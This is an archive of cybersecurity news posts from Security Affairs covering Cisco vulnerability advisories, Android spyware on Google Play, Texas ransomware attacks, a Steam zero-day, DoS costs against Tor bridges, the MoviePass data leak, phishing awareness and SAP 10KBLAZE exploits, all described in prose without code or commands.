Category Archives: Pierluigi Paganini

Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency

The Ukrainian Secret Service is investigating the case of employees at a nuclear power plant that connected its system online to mine cryptocurrency.

The Ukrainian Secret Service (SBU) launched an investigation after employees at a local nuclear power plant connected some systems of the internal network to the Internet to mine cryptocurrency.

The incident was first reported by the Ukrainian news site UNIAN.

Nuclear power plants are critical infrastructure, such kind of incident could potentially expose high-sensitive information.

The security incident has happened in July at the South Ukraine Nuclear Power Plant at Yuzhnoukrainsk, in the south of the country.

On July 10, agents of the SBU raided the nuclear power plant and discovered the equipment used by the employees to mining cryptocurrency.

The equipment was discovered present in the power plant’s administration offices.

The Ukrainian authorities are currently investigating if any attackers may have had access to exposed systems to information that could threaten national security.

The SBU seized equipment composed of two metal cases containing that included coolers and video cards (Radeon RX 470 GPU), computer components commonly used in mining factories.

“Further, the SBU also found and seized additional equipment[12] that looked like mining rigs in the building used as barracks by a military unit of the National Guard of Ukraine, tasked with guarding the power plant.” reported ZDnet.

The authorities have charged several employees, but at the time, none was arrested.

In February 2018, a similar incident took place in Russia. Russian authorities arrested some employees at the Russian Federation Nuclear Center facility because they were suspected of trying to use a supercomputer at the plant to mine Bitcoin.

In April 2018, an employee at the Romanian National Research Institute for Nuclear Physics and Engineering an employee abused institute’s electrical network to mine cryptocurrency.

Pierluigi Paganini

(SecurityAffairs – nuclear power plant, hacking)

The post Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency appeared first on Security Affairs.

Cisco warns of the availability of public exploit code for critical flaws in Cisco Small Business switches

Cisco provided updates for security advisories for three flaws affecting Cisco Small Business 220 Series Smart Switches patched in early August.

Cisco has updated security advisories for three vulnerability in Cisco Small Business 220 Series Smart Switches that have been patched in early August. The three vulnerabilities were reported by the security researcher Pedro Ribeiro, aka ‘bashis‘, via Cisco’s VDOO Disclosure Program.

According to the Cisco Product Security Incident Response Team (PSIRT), public exploit code for these flaws is available online.

Cisco Small Business 220 Series Smart Switches

One of the vulnerabilities is critical remote code execution tracked as CVE-2019-1913, an attacker could exploit this flaw to execute arbitrary code with root privileges on the underlying operating system.

“Multiple vulnerabilities in the web management interface of Cisco Small Business 220 Series Smart Switches could allow an unauthenticated, remote attacker to overflow a buffer, which then allows the execution of arbitrary code with root privileges on the underlying operating system.” reads the security advisory.

“The vulnerabilities are due to insufficient validation of user-supplied input and improper boundary checks when reading data into an internal buffer. An attacker could exploit these vulnerabilities by sending malicious requests to the web management interface of an affected device. Depending on the configuration of the affected switch, the malicious requests must be sent via HTTP or HTTPS.

Another flaw is an authentication bypass security flaw tracked as CVE-2019-1912 that resides in the web management interface of Cisco Small Business 220 Series Smart Switches. The flaw could be exploited by an attacker to modify the configuration of an affected device or to inject a reverse shell.

“A vulnerability in the web management interface of Cisco Small Business 220 Series Smart Switches could allow an unauthenticated, remote attacker to upload arbitrary files.” reads the security advisory.

“The vulnerability is due to incomplete authorization checks in the web management interface. An attacker could exploit this vulnerability by sending a malicious request to certain parts of the web management interface. Depending on the configuration of the affected switch, the malicious request must be sent via HTTP or HTTPS. A successful exploit could allow the attacker to modify the configuration of an affected device or to inject a reverse shell.”

The third flaw is a command injection vulnerability tracked as CVE-2019-1914 that could be exploited by an authenticated, remote attackers launch a command injection attack.

The good news is that Cisco is not aware of attacks exploiting the above issues.

“The Cisco Product Security Incident Response Team (PSIRT) is aware of the existence of public exploit code. Cisco PSIRT is not aware of malicious use of the vulnerability that is described in this advisory.” states Cisco.

Cisco also released security patches to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products (UCS) and Integrated Management Controller (IMC).

Also for these flaws, Cisco confirmed it is not aware of attacks in the wild that have exploited them.

Pierluigi Paganini

(SecurityAffairs – Cisco Small Business, hacking)

The post Cisco warns of the availability of public exploit code for critical flaws in Cisco Small Business switches appeared first on Security Affairs.

Cisco addressed several vulnerabilities in UCS products

Cisco released security patches to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products (UCS and IMC).

Cisco has released security fixes to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products.

Most of the flaws affect the Integrated Management Controller (IMC) that is a baseboard management controller that provides embedded server management for Cisco Unified Computing System (UCS) servers.

The critical flaws impacting the CISCO UCS addressed by the tech giant are CVE-2019-1937CVE-2019-1974CVE-2019-1935 and CVE-2019-1938. These flaws could be exploited by remote, unauthenticated attackers to gain elevated privileges, including administrator permissions, on the targeted system.

A remote attacker could exploit the vulnerabilities by sending specially crafted requests and abusing default credentials.

“A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) Supervisor, Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow an unauthenticated, remote attacker to acquire a valid session token with administrator privileges, bypassing user authentication.” reads the advisory for the CVE-2019-1937 flaw.

“The vulnerability is due to insufficient request header validation during the authentication process. An attacker could exploit this vulnerability by sending a series of malicious requests to an affected device. An exploit could allow the attacker to use the acquired session token to gain full administrator access to the affected device.”

Cisco addressed also multiple high-severity vulnerabilities that could be exploited to trigger a denial-of-service (DoS) condition, to execute arbitrary commands with root privileges, obtain sensitive configuration data, elevate privileges, and modify the system configuration,

Some of the flaws addressed by Cisco have been reported by the security researcher Pedro Ribeiro, aka “bashis,” another expert whose identity was not revealed, and some other external researchers.

The good news is that Cisco is not aware of attacks in the wild that have exploited the flaws in UCS and IMC products.

Pierluigi Paganini

(SecurityAffairs – Cisco Unified Computing Products, hacking)

The post Cisco addressed several vulnerabilities in UCS products appeared first on Security Affairs.

App tainted with Ahmyst Open-source spyware appeared on Google Play Store twice

ESET experts discovered that an Android app infected with AhMyth open-source RAT has bypassed the security of Google Play twice over two weeks.

The popular malware researcher Lukas Stefanko from ESET discovered that a malicious spyware, built on the AhMyth open-source espionage tool, was uploaded on Google Play twice over two weeks, bypassing Google security checks.

The malicious app, named Radio Balouch (or RB Music), includes functionality from AhMyth Android RAT.

RB Music is a streaming app for the Balouchi music that is traditional of the Balochistan region in south-western Asia.

“ESET researchers have discovered the first known spyware that is built on the foundations of AhMyth open-source malware and has circumvented Google’s app-vetting process. The malicious app, called Radio Balouch aka RB Music, is actually a fully working streaming radio app for Balouchi music enthusiasts, except that it comes with a major sting in its tail – stealing personal data of its users.” wrote Stafanko. “The app snuck into the official Android app store twice, but was swiftly removed by Google both times after we alerted the company to it.”

The source code of the RAT is available on GitHub since October 2017.

According to ESET experts, this is the first case of malicious apps built on AhMyth that spread through the official Google store bypassing Google’s app-vetting mechanism.

The app is able to steal contacts, harvest files stored on the device and send SMS messages from the affected device. It also implements a feature to steal SMS messages stored on the device, but this functionality can’t be utilized since Google’s recent restrictions only allow the default SMS app to access those messages.

Stafanko pointed out that the AhMyth code inside the app was not obfuscated or protected, making it very easy to be detected, by Google failed it.

The experts discovered twice different versions of the malicious Radio Balouch app on Google Play, the application had 100 downloads.

The researchers first discovered the app on Google Play on July 2, 2019, then it was removed within 24 hours. The Radio Balouch app reappeared on Google Play on July 13th, 2019, ESET discovered it and alerted Google that quickly removed it.

The malicious app was also distributed via third-party app stores, via a dedicated website, radiobalouch[.]com, via a link promoted via a related Instagram account. The expert discovered that the server was also used for the spyware’s C&C communications. The domain was registered on March 30th, 2019, and after the ESET report, it was taken down by the threat actors.

Once the app is executed, it will ask users to choose their preferred language (English or Farsi), then it starts requesting permissions such as the access to files on the device and the access to the contacts.

“Then, the app requests the permission to access contacts. Here, to camouflage its request for this permission, it suggests this functionality is necessary should the user decide to share the app with friends in their contact list. If the user declines to grant the contact permissions, the app will work regardless.” continues the report.

After the setup, the malicious app displays its home screen with music options, and allows users to register and login. This feature is fake, the user will be always authenticated for every input he will provide. Experts believe this feature has been implemented to lure credentials from the victims and try to break into other services that share the same credentials.  

“The (repeated) appearance of the Radio Balouch malware on the Google Play store should serve as a wake-up call to both the Google security team and Android users. Unless Google improves its safeguarding capabilities, a new clone of Radio Balouch or any other derivative of AhMyth may appear on Google Play.” Stefanko concludes.

“While the key security imperative “Stick with official sources of apps” still holds, it alone can’t guarantee security. It is highly recommended that users scrutinize every app they intend to install on their devices and use a reputable mobile security solution.

Pierluigi Paganini

(SecurityAffairs – ahMyth, spyware)

The post App tainted with Ahmyst Open-source spyware appeared on Google Play Store twice appeared first on Security Affairs.

The Dangers of Using Unsecured Wi-Fi Networks

Isn’t public Wi-Fi great? If you’re having a tea or coffee in a cafe or restaurant you can check your emails and social media.

If you’re waiting for a flight what better way to pass the time than logging onto your favourite website, checking your bank account or even doing a bit of online shopping? And you don’t have to pay a penny or cent. It’s free and you’re not eating into your data allowance. 

Except there’s a problem. Public Wi-Fi is notoriously insecure. Data that travels over a public hotspot network is rarely encrypted. This means that every time you use public Wi-Fi, anybody who is looking can see everything you are doing. They can see the passwords you use, your email address, your name and physical address, phone numbers and any other type of personal information that you might happen to enter into a website. They can certainly see the websites you are visiting. 

This information is gold dust to cyber criminals. It enables them to access and rake through your emails, target you with specific phishing mails, call you with targeted messages and even capture and exploit your payment card details if you happened to buy something online when using public Wi-Fi.

Hackers capture this unencrypted network traffic by interfering with the public Wi-Fi or by creating an ‘evil twin’ fake network which looks legitimate but has actually been set up by the hacker. Because attackers are typically silently observing the public Wi-Fi traffic these attacks are difficult to spot.

  • An attacker could see that a user is accessing a banking site and change the destination account number to a fake website they have set up that emulates the legitimate site.
  • Attackers can also redirect users to making a so called ‘important’ download or update, which actually is a Trojan horse for malware that is planted on your device. 

These attacks can also be easily automated. For instance there are automated tools that look for passwords and write them into a file whenever they see one. There are automated attacks that wait for particular requests, such as accessing Amazon.com, designed to scoop up usernames and passwords.

In the name of self defence

These attacks aren’t theoretical. Hotels are a favorite target, especially during the holidays, but so are shopping malls, airports, cafes and different types of transport stations.

So what can you do to protect yourself? The answer is a virtual private network (VPN) which creates a private tunnel between your device and the internet and encrypts your data. It essentially locks down your network traffic so no one can see what you are doing when you use public Wi-Fi. 

BullGuard VPN for instance uses military grade encryption which would take more than a lifetime to crack. When confronted with this level of protection, hackers simply move on. 

Further it also protects you from other types of snooping whether its companies trying to track your movements or even governments spying on their citizens. In short, you reclaim your privacy and can use the internet with total freedom and safety, even on public Wi-Fi.

About the AuthorSusan Alexandra is a cybersecurity and privacy enthusiast. She writes for publications like GlobalSign, Tripwire, SecurityAffairsSecurityToday and CyberDefenseMagazine. She is a small business owner, traveler and investor of cryptocurrencies. Susan’s inbox is open for new ideas and stories, feel free to share story ideas to susanalexandra67@gmail.com

Pierluigi Paganini

(SecurityAffairs – Wi-Fi, hacking)


The post The Dangers of Using Unsecured Wi-Fi Networks appeared first on Security Affairs.

Texas attackers demand $2.5 million to allow towns to access encrypted data

Crooks behind the attacks against Texas governments are now demanding $2.5 million to allow victims to access encrypted data.

The cybercriminals behind the wave of attacks that hit 23 Texas governments are now demanding $2.5 million to allow victims to access encrypted data.

The attacks started in the morning of August 16 and security experts investigating the incidents believe that it was a coordinated attack carried out by a single cyber crime gang.

Initially, it was said that at least 23 local government organizations were impacted by the ransomware attacks. The Department of Information Resources (DIR) is currently still investigating them and providing supports to mitigate the attacks, anyway evidence continues to point to a single threat actor.

The State Operations Center (SOC) was the attacks were detected.

According to the Texas Department of Information Resources (DIR) the number of impacted towns has been reduced to 22.

“As of the time of this release, responders have engaged with all twenty-two entities to assess the impact to their systems and bring them back online.” reads an update provided by the DIR.

“More than twenty-five percent of the impacted entities have transitioned from response and assessment to remediation and recovery, with a number of entities back to operations as usual.”

The city of Keene confirmed the attack and announced it is working with law enforcement to resolve a cyber incident.

Another of the towns hit by the ransomware attack, the City of Borger, confirmed that business and financial operations and services were impacted, although basic and emergency services continued to be operational.

“On the morning of August 16, 2019 the City of Borger was one of more than 20 entities in Texas that reported a ransomware attack.” reads the press release published by the City of Borger.

“Currently, Vital Statistics (birth and death certificates) remains offline, and the City is unable to take utility or other payments. Until such time as normal operations resume, no late fees will be assessed, and no services will be shut off,”

Keene Mayor Gary Heinrich told NPR the attackers are asking for $2.5 million to unlock the files.

“Well, just about everything we do at City Hall is impacted” Heinrich said.

“They got into our software provider, the guys who run our IT systems. A lot of folks in Texas use providers to do that, because we don’t have a staff big enough to have IT in house.”

Unfortunately, ransomware attacks are a big problem for US Government and City Offices, recently some cities in Florida were victims of hackers, including Key Biscayne, Riviera Beach and Lake City.

In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Pierluigi Paganini

(SecurityAffairs – Texas, ransomware)

The post Texas attackers demand $2.5 million to allow towns to access encrypted data appeared first on Security Affairs.

A new Zero-Day in Steam client impacts over 96 million Windows users

A new zero-day vulnerability in the for Windows impacting over 96 million users was disclosed by researcher Vasily Kravets.

A news zero-day flaw in the Steam client for Windows client impacts over 96 million users. The flaw is a privilege escalation vulnerability and it has been publicly disclosed by researcher Vasily Kravets.

Kravets is one of the researchers that discovered a first zero-day flaw in the Steam client for Windows, the issue was initially addressed by Valve, but the researcher Xiaoyin Liu disclosed a bypass to the fix implemented by Valve to re-enable to issue.

Valve did not award Kravets and banned him from it bug bounty program.

Kravets decided to publicly disclose the privilege escalation that could be exploited by attackers run executables using the privilege of Steam Client Service’s  NT AUTHORITY\SYSTEM.

The expert explained that it used the BaitAndSwitch, a technique, that combines creation of links and oplocks to win TOCTOU (time of check\time of use).

The attack scenario sees hackers getting remote code execution privileges by exploiting a vulnerability in a Steam game, a Windows app, or the OS itself, then elevating privileges by triggering this second zero-day to run a malicious payload using SYSTEM permissions.

“As a result any code code could be executed with maximum privileges, this vulnerability class is called «escalation of privileges» (eop) or «local privilege escalation» (lpe). Despite any application itself could be harmful, achieving maximum privileges can lead to much more disastrous consequences.” wrote Kravetz. “For example, disabling firewall and antivirus, rootkit installation, concealing of process-miner, theft any PC user’s private data — is just a small portion of what could be done. “

Kravets published the following two PoC videos for this second zero-day flaw in Steam client for Windows. He demonstrated two methods that could be exploited by attackers to gain SYSTEM permissions on any Windows system running an unpatched Steam version.

Pierluigi Paganini

(SecurityAffairs –– Stream client, zero-day)

 

The post A new Zero-Day in Steam client impacts over 96 million Windows users appeared first on Security Affairs.

DoS attacks against most used default Tor bridges could be very cheap

Researchers explained that carrying out attacks against the most used default Tor bridges would cost threat actors $17,000 per month.

According to security researchers Rob Jansen from the U.S. Naval Research Laboratory, and Tavish Vaidya and Micah Sherr from Georgetown University, launching denial-of-service (DoS) attacks against most commonly used default Tor bridges would cost attackers $17,000 per month.

DoS attacks could be used for preventing users to access the popular anonymizing network or to carry out attacks to de-anonymize Tor users with techniques such as traffic correlation.

For a modest sum, threat actors could target Tor bridges saturating their resources and causing significant degradation of network performance.

In a research paper presented at the 2019 USENIX Security Symposium, the experts explained that targeting the entire Tor network with a DoS attack could be very expensive, it would cost millions of dollars each month, but targeted attacks against specific Tor bridges are economically feasible.

“First, we explore an attack against Tor’s most commonly used default bridges (for censorship circumvention) and estimate that flooding those that are operational would cost $17K/mo. and could reduce client throughput by 44% while more than doubling bridge maintenance costs. Second, we explore attacks against the TorFlow bandwidth measurement system and estimate that a constant attack against all TorFlow scanners would cost $2.8K/mo. and reduce the median client download rate by 80%.” reads the paper. “Third, we explore how an adversary could use Tor to congest itself and estimate that such a congestion attack against all Tor relays would cost $1.6K/mo. and increase the median client download time by 47%. Finally, we analyze the effects of Sybil DoS and deanonymization attacks that have costs comparable to those of our attacks.”

The experts estimate that the total link capacity across the Tor network ranged from 429 to 575 Gbit/s over the year; for their research, the experts used the average of 512.73 Gbit/s this means that the attacker would spend around $10,000 per hour to use a DoS stresser service to hit each Tor relay. Overall code per month is $7.2 million. 

An attack on Tor’s most commonly used default bridges and flooding them would only cost around $17,000 per month, in this way the attackers could reduce client throughput by 44% and more than double bridge maintenance costs. 

An attack aimed at all scanners in the Tor Flow bandwidth measurement system would cost $2,800 per month and reduce the median client download rate by 80%. 

The expert discovered that threat actors could use Tor to congest itself and such kind of attack would cost $1,600 per month, resulting in the median client download time increasing by 47%. 

In order to examine the performance of the network’s bridges the experts focused on 25 default bridges that use obfs4 obfuscation protocol2, because most of Tor bridge use default bridges and obfs4.

“To test their performance, we use a modified version of Tor to download a 6 MiB file through each bridge. Surprisingly, we find that only 48% (12/25) of the obfs4 default bridges included in Tor Browser Bundle (TBB) are operational.” continues the experts. “The Tor Browser Bundle (TBB) includes a set of 38 hard-coded default bridges (as of version 8.0.3). Users who cannot directly access Tor relays can configure TBB to connect via one of these default bridges “

To compare against the performance of unlisted bridges, the experts requested 135 unlisted obfs4 bridges from the Tor Project’s bridge authority via its web and email interfaces. 95 of the acquired unlisted bridges were found to be functional.

The researchers estimate that the costs to launch a DoS attack against the 38 default bridges could be of around $31,000 per month. Considering that nation-state actors could be interested in targeting these default Tor bridges, this budget could be a good investment for them.

Experts explained that considering that 90% of bridge traffic passes through default bridges, forcing it to unlisted bridges could have a significant impact on network performance.

Tor bridges attacks

The study also compared the presented attack scenarios with launching a Sybil DoS attack, where the adversary could run Sybil relays and then arbitrarily degrade traffic performance or deny service by dropping circuits, or de-anonymize users by observing both the entry and exit points in a vulnerable circuit, and concludes that attacks on Tor bridges are more flexible and less expensive. 

“On the positive side, we find that Tor’s growth has made it more resilient at least to simple attacks: disrupting the service by na¨ıvely flooding Tor relays using stresser services is an expensive proposition and requires $7.2M/month. Unfortunately, however, several aspects of Tor’s design and rollout make it susceptible to more advanced attacks.” the researchers conclude. “We find that Tor’s bridge infrastructure is heavily dependent on a small set of fixed default bridges, the operational of which can be disrupted at a cost of $17K/month”  

Further technical details on the attack techniques are reported in the interesting analysis published by the experts.

Pierluigi Paganini

(SecurityAffairs – Tor bridges, hacking)

The post DoS attacks against most used default Tor bridges could be very cheap appeared first on Security Affairs.

The Cost of Dealing With a Cybersecurity Attack in These 4 Industries

A cybersecurity issue can cause unexpected costs in several different areas, which is the cost of Dealing with an attack in 4 Industries?

A cybersecurity issue can cause unexpected costs in several different areas. In addition to the monetary costs associated with things like lost productivity and improving network security to reduce the likelihood of future incidents, affected companies have to deal with the costs tied to reduced customer trust and damaged reputations.

It’s not always easy or straightforward to pinpoint the overall costs of recovering from a cyberattack. The totals also vary by industry. However, here’s some research that illuminates the various financial impacts for these four sectors.

1. Health Care

Health care is particularly vulnerable to cyberattacks. Criminals are aware that facilities typically handle large numbers of records containing exceptionally in-demand information that is 10 times more valuable on the black market than a credit card number. A report from Carbon Black showed that two-thirds of respondents said cyberattacks had gotten more sophisticated over the past year, too.

A victimized health care organization spends an average of $1.4 million to recover from a cyber incident. It also doesn’t help that many health care organizations are not promptly aware of cyberattacks. Experts say that most organizations don’t discover active cyberattacks for at least 18 months.

The longer an attack progresses without detection, the more costly the damage will likely be to fix. And, the costs go up if the health care facility does not have a cybersecurity response plan to use after an attack gets identified.

2. Retail

As people have growing opportunities to shop online, the chances for hackers to carry out lucrative cyberattacks in the retail sector also go up. Statistics from 2016 showed that the average cost per compromised retail record was $172. Some of the costs relate to hiring consultants to get to the bottom of breaches and paying fines to payment processors or credit card brands for insufficient security.

People are becoming less tolerant of retailers that have widescale data breaches. Additionally, the convenience and choice offered by online shopping increase the likelihood that if a person stops doing business with one retailer, they can probably find what they need elsewhere.

3. Manufacturing

The manufacturing industry was not always known to embrace connected technology, but that’s changing. Many brands recognize that keeping their machines connected to the internet can assist them with tracking trends, avoiding downtime and more.

One of the reasons why it’s tough to calculate a straightforward figure for cyberattacks is that there are so many related costs that may not be immediately apparent. For example, manufacturing companies can expect a cyberattack itself to cost about $1.7 million. But, other expenses can quickly stack up, including those related to lost productivity, customer churn and the need to hire extra staff members to help with cleaning up after a cyberattack.

Analysts also say that the manufacturing industry is extremely attractive to hackers. In addition to planning attacks that cause supply chain disruptions, cybercriminals may target manufacturing entities as part of nation-state attacks. Although those make up a small percentage of overall attacks, they took 500 times longer to resolve in 2017 than the previous year.

4. Finance

The very nature of the financial industry and the money it handles make the sector ripe for a cyberattack. It also tops the list of annual cybercrime costs at about $18 million.

But, the costs also vary depending on the type of attack a financial brand suffers. A report published collaboratively by two organizations showed that the average cost of a malware attack for a financial brand was $825,000. But, the expenses climb dramatically for a distributed denial of service (DDoS) attack. The expenses of those incidents are approximately $1.8 million.

The numbers of attacks on the financial industry are going up, too. Research associated with entities in the United Kingdom confirmed a five-fold increase of reported hacks on financial institutions in 2018 compared to 2017. That trend suggests that financial institutions have to be especially vigilant to protect against future attacks. Doing so often requires substantial financial resources.

Moving in a Worrying Direction

This list gives industry-specific snapshots of cybersecurity costs associated with particular industries. But, even sectors that are not on this list should be concerned about potential losses. Many cybersecurity experts agree that the expenses of cyberattacks, in general, are steadily going up.

The expenses and effort required for resolution are also impacted by the growing complexity of cybercriminals’ tactics.

Dealing with the initial aftermath of an attack is only the beginning. Companies also have to assure customers that they’ve taken steps to prevent other problems — and stay committed to that promise.

All of these aspects require significant financial investments, as well as a recognition that cyberattacks are genuine threats to tackle.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post The Cost of Dealing With a Cybersecurity Attack in These 4 Industries appeared first on Security Affairs.

Thousands credit card numbers of MoviePass customers were exposed online

A security expert discovered that the popular movie ticket subscription service MoviePass has exposed thousands of customer card numbers and personal credit cards.

The security expert Mossab Hussein from cybersecurity firm SpiderSilk, discovered that MoviePass exposed a database containing the credit card data on one of its subdomains. The archive was containing 161 million records and the amount of data continues to grow in real-time.

The researcher discovered that the records in the database were not encrypted.

The database included both data logs and sensitive user data, such as customer card numbers. According to Techcrunch, which analyzed a sample of 1,000 records, data are authentic.

“We reviewed a sample of 1,000 records and removed the duplicates. A little over half contained unique MoviePass debit card numbers. Each customer card record had the MoviePass debit card number and its expiry date, the card’s balance and when it was activated.” reported Techcrunch.

Moviepass

The archive contained more than 58,000 records including card data, and according to the expert, it was growing over time.

The unsecured database also contained customers’ personal credit card numbers and their expiry date, along with billing information (names and postal addresses). In some cases, available data could expose owners to frauds.

Logging data included email addresses and incorrectly typed passwords.

Hussain attempted to report his discovery to MoviePass, but he did receive any reply. The service was taken offline after TechCrunch reported the issue to the company.

TechCrunch reported that security firm RiskIQ first detected the exposed archive in late June, the database may have been exposed for months.

“We keep on seeing companies of all sizes using dangerous methods to maintain and process private user data,” Hussein told TechCrunch. “In the case of MoviePass, we are questioning the reason why would internal technical teams ever be allowed to see such critical data in plaintext — let alone the fact that the data set was exposed for public access by anyone,”.

Pierluigi Paganini

(SecurityAffairs – data leak, hacking)

The post Thousands credit card numbers of MoviePass customers were exposed online appeared first on Security Affairs.

Cyber Defense Magazine – May 2019 has arrived. Enjoy it!

Cyber Defense Magazine May 2019 Edition has arrived. We hope you enjoy this month’s editionpacked with over 160+ pages of excellent content.

cyber defense magazine may

Cyber Defense eMagazine for May 2019

cyber defense magazine may 1
cyber defense magazine may 2

Pierluigi Paganini

(SecurityAffairs – Cyber Defense Magazine, hacking)

The post Cyber Defense Magazine – May 2019 has arrived. Enjoy it! appeared first on Security Affairs.

Using the Human Factor in Cyber Attacks

The Human Factor has a fundamental importance for the success of a cyber attack, for this reason it is important to create a culture of cyber security within organizations.

Every day we see a large number of tools being implemented within enterprises and institutions due to the need to keep their environments more secure, along with this implementation of tools comes a series of responsibilities to make resources be used efficiently and effectively, generating the results expected by the Analysts, Managers, and Management. When we speak of a corporate environment there are a number of tools that we can find, such as Web Application Firewall (WAF), Intrusion Prevention Service (IPS), Antispam, Antivirus, Firewall, Web Filter / Application Control, DLP (Data Loss Prevent) Switches, Routers and etc. Each of these tools has its characteristic and function within the corporate environment, being well configured generate results and metrics that help managers make decisions for environment/business growth, security improvement, and others.

In recent years there has been a significant increase in cyber attacks and attempts to exploit vulnerabilities, attackers have increasingly studied CVEs (Common Vulnerabilities and Exposures) based on this knowledge to try to exploit, invade and exfilt data from companies or individuals. When implementing a security tool within a company, it is necessary to pay attention to some points that go beyond the implementation project, some of these points are maintenance and updating of the tool following the good practices of the manufacturer. A very common error that occurs today and makes many companies vulnerable to attacks is that they only care about the tool in the implementation process, after that the points mentioned above that require constant attention during the tool life cycle inside the company are forgotten and make the environment susceptible to attacks and exploitations.

Some points that make environments vulnerable:

  • Old tools.
  • Outdated tools.
  • Poor resource management.
  • Human factor.

From these points mentioned above, I would like to draw attention to the ‘Human Factor’, due to the technological growth, it became fundamental the importance of creating a culture of security policy in the day to day of the collaborators. Companies are investing more and more in lectures, training and workshops to try to reduce an attack or invasion is caused by the human factor, when we speak of human factor can be exemplified as follows: the attacker sends an email with a supposed advertisement or promotion and in it comes a link that will direct the user to this “promotion”, but when in fact it is a malicious link (this attack is called Phishing), the user may be infected with some Malware and from that machine the attacker has internal access and begins to make lateral movements in an attempt to exploit or compromise the company environment. Every day we see research being done by tool makers showing that most of the attacks that occur still have the human factor, that is, a user who is not prepared to identify some simple types of attacks, such as phishing and that can compromise the entire security of the company.

There are currently three most commonly used types of Phishing attacks:

Mass-Scale Phishing: Attack where fraudsters launch an extensive network of attacks that are not highly targeted

Spear Phishing: Tailor-made for a specific victim or group of victims using personal details.

Whaling: A specialized type of spear phishing that targets a “large” victim of a company, for example CEO, CFO or other executive.

Below we have the anatomy of a phishing attack:

human factor

About the author: Zoziel Freire

Cyber Security Analyst Content Writer of the portal: www.infosectrain.com Analyst document’s malicious CompTIA Security Analytics Professional LPIC-3 Enterprise Linux Professionals CompTIA Cybersecurity Analyst Linkedin: https://www.linkedin.com/in/zozielfreire/

Pierluigi Paganini

(SecurityAffairs – Human Factor, cybersecurity)

Twitter: https://twitter.com/zoziel

The post Using the Human Factor in Cyber Attacks appeared first on Security Affairs.

Cisco addresses a critical flaw in Nexus 9000 switches

Cisco released security patches to address tens of vulnerabilities in its products, including a critical vulnerability affecting Nexus 9000 switches.

Cisco released security patches to address tens of vulnerabilities in its products. Among the flaws fixed by Cisco, there is also a critical vulnerability in Nexus 9000 switches that is tracked as CVE-2019-1804 and that received a CVSS score of 9.8.

Cisco Nexus 9000

The vulnerability resides in the SSH key management for the Cisco Nexus 9000 Series Application Centric Infrastructure Mode Switch Software and it is related to the presence of a default SSH key pair in all devices.

The default SSH key pair could be exploited by an attacker by opening an SSH connection via IPv6 to a targeted device, in this way the attacker will be able to connect to the system with the privileges of the root user.

“A vulnerability in the SSH key management for the Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch Software could allow an unauthenticated, remote attacker to connect to the affected system with the privileges of the rootuser.” reads the security advisory published by Cisco.

“The vulnerability is due to the presence of a default SSH key pair that is present in all devices. An attacker could exploit this vulnerability by opening an SSH connection via IPv6 to a targeted device using the extracted key materials. An exploit could allow the attacker to access the system with the privileges of the root user.”

This flaw could not be exploitable over IPv4.

The flaw affects Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode running Cisco NX-OS software release prior to 14.1(1i).

Users have to install software update released by Cisco to address the flaw, no workaround is known.

The good news is that Cisco is not aware of the exploitation of the vulnerability in attacks in the wild.

Cisco also addressed over 20 High severity vulnerabilities affecting the Web Security Appliance (WSA), Umbrella Dashboard, Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software, RV320 and RV325 routers, IP Phone 7800 and 8800 Series, Application Policy Infrastructure Controller (APIC) software, and the Nexus 9000 switches.

The list of flaws includes privilege escalation issues, denial of service vulnerabilities and session hijacking bugs.

Pierluigi Paganini

(SecurityAffairs – Cisco Nexus 9000, hacking)

The post Cisco addresses a critical flaw in Nexus 9000 switches appeared first on Security Affairs.

10KBLAZE exploits could affect 9 out of 10 SAP installs of more than 50k customers

The availability of 10KBLAZE PoC exploits for old SAP configuration issue poses a severe risk of attacks for business applications.

The risk of cyber attacks against SAP systems is increased after security researchers released PoC exploits for old SAP configuration flaws.

SAP Message Server and SAP Gateway implements an access control list (ACL) mechanism to determine IP addresses that are allowed to register application servers. ACL wrong configurations could allow any host with network access to the Message Server to register an application server.

In this scenario, an attacker can access a network hosting the vulnerable systems and take full control.

Experts pointed out that the problem could impact many SAP products, including S/4HANA and NetWeaver Application Server (AS).
The good news is that most recent versions of SAP software are configured by default to drop unauthorized connections,

Since 2005, SAP is providing instructions on how to configure an ACL for the Message Server. In 2005 the company released the security note 8218752 and in 2009 released the security note 14080813 containing instructions on how to properly configure the access list for Gateway. In 2010 SAP released another note, 14210054, that provides instructions on the correct configuration of Message Server ACL.

Despite the numerous notes, many organizations still fail to properly configure their SAP solutions. According to a report published in April 2018 by security firm Onapsis, 90 percent SAP systems were impacted by 13 Year-Old configuration vulnerability that affects SAP Netweaver and that can be exploited by a remote unauthenticated attacker who has network access to the system.

In April, the two researchers Dmitry Chastuhin and Mathieu Geli presented at the OPCDE cybersecurity conference in Dubai security issues related to SAP configuration and architecture.

The security duo also released exploits designed to target improperly configured systems.

sap 10KBLAZE exploits

Experts at Onapsis dubbed the exploits 10KBLAZE, they estimate that the availability of the hacking codes could significantly increase the number of attacks against SAP installs. Onapsis estimate that 10KBLAZE exploits could affect 9 out of 10 SAP systems of more than 50,000 customers worldwide.

“In April 2019, several new exploits targeting SAP business applications were released in a public forum. Although the exploits target insecure configurations that have been reported by SAP SE and Onapsis in the past, their public release significantly increases the risk of successful cyber attacks against SAP implementations globally.” reads the analysis published by Onapsis. “we estimate these exploits could affect 9 out of 10 SAP systems of more than 50,000 customers world-wide.”

